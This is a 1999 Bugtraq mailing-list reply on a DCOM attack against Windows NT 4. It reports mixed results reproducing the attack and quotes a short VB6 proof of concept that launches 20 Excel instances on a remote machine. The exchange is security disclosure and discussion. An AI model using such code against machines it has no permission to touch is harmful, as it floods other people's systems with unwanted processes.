Bugtraq mailing list archives

Re: FW: DCOM attack against NT using VB6

From: erik () ERIKNIELSEN COM (Erik Nielsen)
Date: Thu, 19 Aug 1999 18:09:42 -0700


First off, Could not run the program without proper permission on the target
machine. Then, could not recreate on SP3 or SP4. The program just went
through it's paces with no action resulting.

Targets were NT 4 with SP3 and SP4, both with Office 97
Source machine was WIN95 OSR2 with VB6 SP3.

Using the code below I was able to create 20 instances of Excel on my
co-workers machines without modifying their machines at all.  The target
must be Windows NT Workstation/Server running sp3 or sp4. sp5 seems to
prevent the attack.

Private Sub Command1_Click()
   Dim xlObj As Object
   Dim xlCollection As New Collection
   Dim i As Long
   For i = 1 To 20
       Set xlObj = CreateObject("Excel.Application", "\\NTBox")
       xlCollection.Add xlObj
   Next i

   i = 1
   'clean up
   While xlCollection.Count > 0
       xlCollection.Remove (xlCollection.Count)
   Wend
   Set xlCollection = Nothing
End Sub

-Robert E. Lempke

Current thread:

Re: DCOM attack against NT using VB6 Hargett, Matt (Aug 18)
- Re: FW: DCOM attack against NT using VB6 Max Vision (Aug 19)
- <Possible follow-ups>
- Re: FW: DCOM attack against NT using VB6 Erik Nielsen (Aug 19)
- Re: FW: DCOM attack against NT using VB6 Hargett, Matt (Aug 20)
- Re: FW: DCOM attack against NT using VB6 David LeBlanc (Aug 22)
- Re: DCOM attack against NT using VB6 Hargett, Matt (Aug 24)
- Re: FW: DCOM attack against NT using VB6 Russ (Aug 24)